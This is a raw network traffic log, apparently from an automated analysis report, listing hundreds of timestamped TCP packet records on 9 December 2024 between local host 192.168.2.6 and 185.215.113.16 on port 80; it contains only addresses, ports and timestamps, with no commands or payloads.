                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.804522038 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.804533958 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.806277990 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.806623936 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.806680918 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.807519913 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.807600975 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.807651997 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.808465004 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.808479071 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.808518887 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.808536053 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.809178114 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.809226036 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.809525967 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.809570074 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.810018063 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.810056925 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.810671091 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.810724020 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.811323881 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.811336040 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.811366081 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.811378956 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.812093973 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.812232971 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.812294960 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.813179970 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.813339949 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.813384056 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.814189911 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.814203024 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.814235926 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.814253092 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.815139055 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.815475941 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.815521002 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.816315889 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.816359997 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.816504955 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.816546917 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.817467928 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.817631006 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.817677975 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.818296909 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.818603992 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.818639040 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.818651915 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.819612980 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.819773912 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.819814920 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.820452929 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.820494890 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.820975065 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.821404934 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.821453094 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.821918011 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.821965933 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.822417974 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.822745085 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.822777033 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.822794914 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.823560953 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.823615074 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.823740959 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.824460030 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.824522018 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.824567080 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.824711084 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.824745893 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.825545073 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.825594902 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.825722933 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.825757027 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.826522112 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.826695919 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.826749086 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.827646017 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.827820063 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.827884912 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.828613043 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.828772068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.828814983 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.829705954 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.829749107 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.829914093 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.830564022 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.830610037 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.830748081 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.830789089 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.831707001 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.832015991 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.832056999 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.832886934 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.832905054 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.832926035 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.832943916 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.977354050 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.977442980 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.977495909 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.977543116 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.977838993 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.977876902 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.978029013 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.978061914 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.979017019 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.979034901 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.979068041 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.979099035 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.979986906 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.981031895 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.997853994 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.997868061 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.997915030 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.998336077 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.998347998 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.998375893 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.998404026 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.999453068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.999602079 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.999641895 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.000406027 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.000446081 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.000586987 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.000626087 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.001580000 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.001735926 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.001796961 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.002675056 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.002751112 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.002988100 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.003025055 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.003648996 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.003973961 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.004014015 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.004621983 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.004689932 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.004934072 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.004977942 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.005630016 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.005641937 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.005681038 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.006469011 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.006510973 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.006820917 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.006859064 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.007698059 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.007838964 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.007853031 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.007898092 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.008663893 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.008986950 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.009037971 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.009671926 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.009712934 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.009851933 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.009888887 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.010684967 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.010725975 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.011043072 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.011085033 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.011717081 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.012082100 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.012132883 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.012731075 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.012782097 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.013235092 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.013278961 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.013731003 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.014050007 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.014098883 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.014833927 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.014880896 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.015013933 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.015054941 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.015851974 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.015904903 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.016005039 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.016407967 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.016825914 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.016880989 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.017285109 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.018091917 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.018105030 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.018151045 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.018901110 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.018949986 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.019048929 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.019090891 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.019902945 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.020267010 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.020436049 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.020529032 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.021087885 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.021277905 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.021334887 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.021990061 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.022046089 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.022217989 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.022839069 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.023139954 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.023194075 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.023369074 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.023411036 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.023423910 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.023436069 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.023466110 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.025675058 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.025850058 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.026189089 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.026242018 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.026562929 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.026891947 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.026946068 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.027529001 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.027543068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.027607918 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.028158903 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.028224945 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.028340101 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.028376102 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.029205084 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.029217005 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.029254913 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.030347109 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.030385017 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.030533075 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.030570984 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.031199932 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.031307936 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.031374931 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.031480074 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.032397985 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.032448053 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.032574892 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.032618046 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.033437014 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.033452034 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.033503056 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.034255981 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.034308910 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.034603119 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.034650087 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.035289049 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.035331011 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.035633087 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.035681009 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.036477089 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.036523104 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.036811113 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.036854982 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.037481070 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.037530899 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.037789106 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.037971020 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.038435936 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.038752079 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.038794041 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.039484978 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.039527893 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.040095091 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.040421963 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.040465117 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.040590048 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.040627003 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.041449070 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.041496992 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.041558027 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.041686058 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.041733980 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.041815042 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.041891098 CET4994580192.168.2.6185.215.113.16
